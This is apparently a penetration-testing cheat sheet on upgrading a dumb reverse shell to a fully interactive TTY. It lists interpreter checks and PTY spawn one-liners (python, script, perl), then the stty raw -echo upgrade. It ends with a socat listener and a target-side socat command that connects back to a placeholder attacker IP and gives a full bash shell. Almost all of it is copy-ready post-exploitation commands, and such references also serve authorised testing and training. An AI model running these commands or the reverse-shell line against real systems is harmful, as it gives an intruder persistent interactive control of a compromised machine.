Shell Upgrade & TTY
Turn a dumb reverse shell into a fully interactive TTY (arrow keys, tab, Ctrl-C), and figure out which interpreter is actually on the box. Each payload is its own copy block.
Which interpreter is available
Check before you pick a payload:
which python python3 python2 perl ruby socat scriptConfirm the python version:
ls -la /usr/bin/python*Spawn a PTY
python3 (most common):
python3 -c 'import pty; pty.spawn("/bin/bash")'python2:
python -c 'import pty; pty.spawn("/bin/bash")'No python, use script:
script -qc /bin/bash /dev/nullNo python, use perl:
perl -e 'exec "/bin/bash";'Full upgrade
After the PTY, background the shell:
Ctrl+ZOn your local box, drop to raw and resume:
stty raw -echo; fgBack in the shell, set the term:
export TERM=xtermThen reset:
resetMatch your terminal size
Read your local size:
stty -a | head -1Set it in the remote shell (use your real values):
stty rows 38 columns 190socat full TTY
Listener on your box:
socat file:`tty`,raw,echo=0 tcp-listen:4444Target connects back with a full pty:
socat tcp-connect:<YOUR_IP>:4444 exec:'bash -li',pty,stderr,setsid,sigint,saneIf
stty raw -echo; fgleaves your terminal broken after the shell dies, typeresetand press enter.